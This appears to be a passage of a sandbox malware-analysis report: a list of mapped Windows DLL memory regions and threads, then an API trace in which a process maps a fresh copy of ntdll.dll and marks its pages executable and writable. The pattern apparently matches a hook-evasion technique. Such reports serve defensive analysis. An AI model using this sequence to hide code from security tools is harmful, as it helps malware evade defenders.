Region: id = 3079 start_va = 0x703e0000 end_va = 0x7040efff monitored = 0 entry_point = 0x703f95e0 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 3080 start_va = 0x70410000 end_va = 0x70422fff monitored = 0 entry_point = 0x70419950 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 3081 start_va = 0x70430000 end_va = 0x70437fff monitored = 0 entry_point = 0x70431d70 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\SysWOW64\\dpapi.dll" (normalized: "c:\\windows\\syswow64\\dpapi.dll") Region: id = 3082 start_va = 0x70440000 end_va = 0x70459fff monitored = 0 entry_point = 0x7044fa70 region_type = mapped_file name = "ncryptsslp.dll" filename = "\\Windows\\SysWOW64\\ncryptsslp.dll" (normalized: "c:\\windows\\syswow64\\ncryptsslp.dll") Region: id = 3083 start_va = 0x70460000 end_va = 0x7048bfff monitored = 0 entry_point = 0x7047bb10 region_type = mapped_file name = "ntasn1.dll" filename = "\\Windows\\SysWOW64\\ntasn1.dll" (normalized: "c:\\windows\\syswow64\\ntasn1.dll") Region: id = 3084 start_va = 0x70490000 end_va = 0x704affff monitored = 0 entry_point = 0x7049d120 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\SysWOW64\\ncrypt.dll" (normalized: "c:\\windows\\syswow64\\ncrypt.dll") Region: id = 3085 start_va = 0x704b0000 end_va = 0x704bffff monitored = 0 entry_point = 0x704b4600 region_type = mapped_file name = "mskeyprotect.dll" filename = "\\Windows\\SysWOW64\\mskeyprotect.dll" (normalized: "c:\\windows\\syswow64\\mskeyprotect.dll") Region: id = 3086 start_va = 0x704c0000 end_va = 0x70523fff monitored = 0 entry_point = 0x704dafd0 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\SysWOW64\\schannel.dll" (normalized: "c:\\windows\\syswow64\\schannel.dll") Region: id = 3087 start_va = 0x70610000 end_va = 0x70684fff monitored = 0 entry_point = 0x70649a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 3088 start_va = 0x70690000 end_va = 0x70697fff monitored = 0 entry_point = 0x70691fc0 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 3089 start_va = 0x706a0000 end_va = 0x7073afff monitored = 0 entry_point = 0x706df7e0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\SysWOW64\\winhttp.dll" (normalized: "c:\\windows\\syswow64\\winhttp.dll") Region: id = 3090 start_va = 0x70740000 end_va = 0x70751fff monitored = 0 entry_point = 0x70744510 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\SysWOW64\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\syswow64\\ondemandconnroutehelper.dll") Region: id = 3091 start_va = 0x70760000 end_va = 0x7076afff monitored = 0 entry_point = 0x70764a50 region_type = mapped_file name = "tokenbinding.dll" filename = "\\Windows\\SysWOW64\\tokenbinding.dll" (normalized: "c:\\windows\\syswow64\\tokenbinding.dll") Region: id = 3092 start_va = 0x70770000 end_va = 0x7097cfff monitored = 0 entry_point = 0x7085acb0 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 3093 start_va = 0x717f0000 end_va = 0x7196dfff monitored = 0 entry_point = 0x7186c630 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 3094 start_va = 0x71f20000 end_va = 0x71f66fff monitored = 0 entry_point = 0x71f358d0 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\SysWOW64\\FWPUCLNT.DLL" (normalized: "c:\\windows\\syswow64\\fwpuclnt.dll") Region: id = 3095 start_va = 0x71f70000 end_va = 0x71f77fff monitored = 0 entry_point = 0x71f71920 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\SysWOW64\\rasadhlp.dll" (normalized: "c:\\windows\\syswow64\\rasadhlp.dll") Region: id = 3096 start_va = 0x71f80000 end_va = 0x71faefff monitored = 0 entry_point = 0x71f8bb70 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 3097 start_va = 0x71fb0000 end_va = 0x72033fff monitored = 0 entry_point = 0x71fd6530 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll") Region: id = 3098 start_va = 0x72040000 end_va = 0x7208efff monitored = 0 entry_point = 0x7204d850 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 3099 start_va = 0x720c0000 end_va = 0x7238afff monitored = 0 entry_point = 0x722fc4c0 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 3100 start_va = 0x72400000 end_va = 0x7242bfff monitored = 0 entry_point = 0x72415ee0 region_type = mapped_file name = "fwbase.dll" filename = "\\Windows\\SysWOW64\\fwbase.dll" (normalized: "c:\\windows\\syswow64\\fwbase.dll") Region: id = 3101 start_va = 0x72460000 end_va = 0x724e2fff monitored = 0 entry_point = 0x724837c0 region_type = mapped_file name = "dxgi.dll" filename = "\\Windows\\SysWOW64\\dxgi.dll" (normalized: "c:\\windows\\syswow64\\dxgi.dll") Region: id = 3102 start_va = 0x724f0000 end_va = 0x7263afff monitored = 0 entry_point = 0x72551660 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\SysWOW64\\propsys.dll" (normalized: "c:\\windows\\syswow64\\propsys.dll") Region: id = 3103 start_va = 0x72730000 end_va = 0x72949fff monitored = 0 entry_point = 0x727c5550 region_type = mapped_file name = "d3d11.dll" filename = "\\Windows\\SysWOW64\\d3d11.dll" (normalized: "c:\\windows\\syswow64\\d3d11.dll") Region: id = 3104 start_va = 0x73e40000 end_va = 0x7405bfff monitored = 0 entry_point = 0x7400bc40 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\SysWOW64\\actxprxy.dll" (normalized: "c:\\windows\\syswow64\\actxprxy.dll") Region: id = 3105 start_va = 0x74130000 end_va = 0x741f7fff monitored = 0 entry_point = 0x7419ae90 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\SysWOW64\\WinTypes.dll" (normalized: "c:\\windows\\syswow64\\wintypes.dll") Region: id = 3106 start_va = 0x74200000 end_va = 0x7421afff monitored = 0 entry_point = 0x74209050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 3107 start_va = 0x74220000 end_va = 0x742ecfff monitored = 0 entry_point = 0x742729c0 region_type = mapped_file name = "twinapi.appcore.dll" filename = "\\Windows\\SysWOW64\\twinapi.appcore.dll" (normalized: "c:\\windows\\syswow64\\twinapi.appcore.dll") Region: id = 3108 start_va = 0x744b0000 end_va = 0x74541fff monitored = 0 entry_point = 0x744f0380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 3109 start_va = 0x74550000 end_va = 0x74559fff monitored = 0 entry_point = 0x74552a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 3110 start_va = 0x74560000 end_va = 0x7457dfff monitored = 0 entry_point = 0x7456b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 3111 start_va = 0x74580000 end_va = 0x7465ffff monitored = 0 entry_point = 0x74593980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3112 start_va = 0x74660000 end_va = 0x746f1fff monitored = 0 entry_point = 0x74698cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 3113 start_va = 0x74700000 end_va = 0x747f1fff monitored = 0 entry_point = 0x74738070 region_type = mapped_file name = "comdlg32.dll" filename = "\\Windows\\SysWOW64\\comdlg32.dll" (normalized: "c:\\windows\\syswow64\\comdlg32.dll") Region: id = 3114 start_va = 0x74810000 end_va = 0x7488afff monitored = 0 entry_point = 0x7482e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 3115 start_va = 0x74d00000 end_va = 0x74d12fff monitored = 0 entry_point = 0x74d01d20 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\SysWOW64\\netapi32.dll" (normalized: "c:\\windows\\syswow64\\netapi32.dll") Region: id = 3116 start_va = 0x74d20000 end_va = 0x74da3fff monitored = 0 entry_point = 0x74d46220 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 3117 start_va = 0x74db0000 end_va = 0x74e6dfff monitored = 0 entry_point = 0x74de5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3118 start_va = 0x74e70000 end_va = 0x74eb3fff monitored = 0 entry_point = 0x74e77410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 3119 start_va = 0x74ec0000 end_va = 0x74ec6fff monitored = 0 entry_point = 0x74ec1e10 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 3120 start_va = 0x74ed0000 end_va = 0x753c8fff monitored = 0 entry_point = 0x750d7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 3121 start_va = 0x753d0000 end_va = 0x754bafff monitored = 0 entry_point = 0x7540d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 3122 start_va = 0x754c0000 end_va = 0x754cdfff monitored = 0 entry_point = 0x754c5410 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 3123 start_va = 0x75640000 end_va = 0x75786fff monitored = 0 entry_point = 0x75651cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 3124 start_va = 0x75790000 end_va = 0x757d1fff monitored = 0 entry_point = 0x757a6f10 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\SysWOW64\\wintrust.dll" (normalized: "c:\\windows\\syswow64\\wintrust.dll") Region: id = 3125 start_va = 0x757e0000 end_va = 0x75823fff monitored = 0 entry_point = 0x757f9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 3126 start_va = 0x75830000 end_va = 0x759a7fff monitored = 0 entry_point = 0x75888a90 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 3127 start_va = 0x759b0000 end_va = 0x75a5cfff monitored = 0 entry_point = 0x759c4f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 3128 start_va = 0x75a70000 end_va = 0x75b8efff monitored = 0 entry_point = 0x75ab5980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 3129 start_va = 0x75b90000 end_va = 0x75beefff monitored = 0 entry_point = 0x75b94af0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 3130 start_va = 0x75bf0000 end_va = 0x75dacfff monitored = 0 entry_point = 0x75cd2a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 3131 start_va = 0x75db0000 end_va = 0x771aefff monitored = 0 entry_point = 0x75f6b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 3132 start_va = 0x771b0000 end_va = 0x772fefff monitored = 0 entry_point = 0x77266820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 3133 start_va = 0x77320000 end_va = 0x7732efff monitored = 0 entry_point = 0x77322e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 3134 start_va = 0x77390000 end_va = 0x7741cfff monitored = 0 entry_point = 0x773d9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 3135 start_va = 0x77420000 end_va = 0x7759dfff monitored = 0 entry_point = 0x774d1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3136 start_va = 0x77640000 end_va = 0x77676fff monitored = 0 entry_point = 0x77643b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 3137 start_va = 0x77680000 end_va = 0x776c4fff monitored = 0 entry_point = 0x7769de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 3138 start_va = 0x776d0000 end_va = 0x7772dfff monitored = 0 entry_point = 0x776e7470 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\SysWOW64\\FirewallAPI.dll" (normalized: "c:\\windows\\syswow64\\firewallapi.dll") Region: id = 3139 start_va = 0x77730000 end_va = 0x7773bfff monitored = 0 entry_point = 0x77733930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 3140 start_va = 0x77740000 end_va = 0x7776afff monitored = 0 entry_point = 0x77745680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 3141 start_va = 0x777d0000 end_va = 0x77827fff monitored = 0 entry_point = 0x778125c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 3142 start_va = 0x77830000 end_va = 0x779aafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3143 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 3144 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 3145 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3146 start_va = 0x7fff0000 end_va = 0x7dfdab58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3147 start_va = 0x7dfdab590000 end_va = 0x7ffdab58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfdab590000" filename = "" Region: id = 3148 start_va = 0x7ffdab590000 end_va = 0x7ffdab750fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3149 start_va = 0x7ffdab751000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffdab751000" filename = "" Region: id = 3151 start_va = 0x99c0000 end_va = 0x9b0cfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000099c0000" filename = "" Region: id = 3152 start_va = 0x9b10000 end_va = 0x9c8afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3157 start_va = 0x600000 end_va = 0x603fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Thread: id = 140 os_tid = 0xc08 Thread: id = 141 os_tid = 0x1384 Thread: id = 142 os_tid = 0x1380 Thread: id = 143 os_tid = 0x137c Thread: id = 144 os_tid = 0x1378 Thread: id = 145 os_tid = 0x136c Thread: id = 146 os_tid = 0x1348 Thread: id = 147 os_tid = 0x1344 Thread: id = 148 os_tid = 0x1340 Thread: id = 149 os_tid = 0x133c Thread: id = 150 os_tid = 0x1338 Thread: id = 151 os_tid = 0x1334 Thread: id = 152 os_tid = 0x1330 Thread: id = 153 os_tid = 0x132c Thread: id = 154 os_tid = 0x1328 Thread: id = 155 os_tid = 0x1324 Thread: id = 156 os_tid = 0x1224 Thread: id = 157 os_tid = 0x11fc Thread: id = 158 os_tid = 0x11ec Thread: id = 159 os_tid = 0x11e4 Thread: id = 160 os_tid = 0x11e0 Thread: id = 161 os_tid = 0x11b4 Thread: id = 162 os_tid = 0x11b0 Thread: id = 163 os_tid = 0x1168 [0173.786] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x19f308 | out: HeapArray=0x19f308*=0x430000) returned 0x5 [0173.806] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Windows\\SYSTEM32\\ntdll.dll", NtPathName=0x19f014, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Windows\\SYSTEM32\\ntdll.dll", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0173.810] NtCreateFile (in: FileHandle=0x19f034, DesiredAccess=0x1200a0, ObjectAttributes=0x19effc*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19f01c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19f034*=0x6dc, IoStatusBlock=0x19f01c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0173.840] RtlFreeHeap (HeapHandle=0x430000, Flags=0x0, BaseAddress=0x5157a0) returned 1 [0173.843] NtCreateSection (in: SectionHandle=0x19ef9c, DesiredAccess=0xf, ObjectAttributes=0x0, MaximumSize=0x0, SectionPageProtection=0x10, AllocationAttributes=0x1000000, FileHandle=0x6dc | out: SectionHandle=0x19ef9c*=0x484) returned 0x0 [0174.283] NtMapViewOfSection (in: SectionHandle=0x484, ProcessHandle=0xffffffff, BaseAddress=0x19ef98*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19ef94*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x19ef98*=0x9b10000, SectionOffset=0x0, ViewSize=0x19ef94*=0x17b000) returned 0x40000003 [0174.289] NtClose (Handle=0x6dc) returned 0x0 [0174.290] NtClose (Handle=0x484) returned 0x0 [0174.294] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19f04c*=0x9b10000, NumberOfBytesToProtect=0x19f05c, NewAccessProtection=0x40, OldAccessProtection=0x19f048 | out: BaseAddress=0x19f04c*=0x9b10000, NumberOfBytesToProtect=0x19f05c, OldAccessProtection=0x19f048*=0x2) returned 0x0 [0174.295] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19f040*=0x9b11000, NumberOfBytesToProtect=0x19f044, NewAccessProtection=0x40, OldAccessProtection=0x19f048 | out: BaseAddress=0x19f040*=0x9b11000, NumberOfBytesToProtect=0x19f044, OldAccessProtection=0x19f048*=0x20) returned 0x0 [0174.305] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19f040*=0x9c16000, NumberOfBytesToProtect=0x19f044, NewAccessProtection=0x40, OldAccessProtection=0x19f048 | out: BaseAddress=0x19f040*=0x9c16000, NumberOfBytesToProtect=0x19f044, OldAccessProtection=0x19f048*=0x20) returned 0x0 [0174.305] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19f040*=0x9c17000, NumberOfBytesToProtect=0x19f044, NewAccessProtection=0x40, OldAccessProtection=0x19f048 | out: BaseAddress=0x19f040*=0x9c17000, NumberOfBytesToProtect=0x19f044, OldAccessProtection=0x19f048*=0x20) returned 0x0 [0174.306] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19f040*=0x9c18000, NumberOfBytesToProtect=0x19f044, NewAccessProtection=0x40, OldAccessProtection=0x19f048 | out: BaseAddress=0x19f040*=0x9c18000, NumberOfBytesToProtect=0x19f044, OldAccessProtection=0x19f048*=0x8) returned 0x0 [0174.306] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19f040*=0x9c1c000, NumberOfBytesToProtect=0x19f044, NewAccessProtection=0x40, OldAccessProtection=0x19f048 | out: BaseAddress=0x19f040*=0x9c1c000, NumberOfBytesToProtect=0x19f044, OldAccessProtection=0x19f048*=0x8) returned 0x0 [0174.307] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19f040*=0x9c1f000, NumberOfBytesToProtect=0x19f044, NewAccessProtection=0x40, OldAccessProtection=0x19f048 | out: BaseAddress=0x19f040*=0x9c1f000, NumberOfBytesToProtect=0x19f044, OldAccessProtection=0x19f048*=0x2) returned 0x0 [0174.311] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19f040*=0x9c86000, NumberOfBytesToProtect=0x19f044, NewAccessProtection=0x40, OldAccessProtection=0x19f048 | out: BaseAddress=0x19f040*=0x9c86000, NumberOfBytesToProtect=0x19f044, OldAccessProtection=0x19f048*=0x2) returned 0x0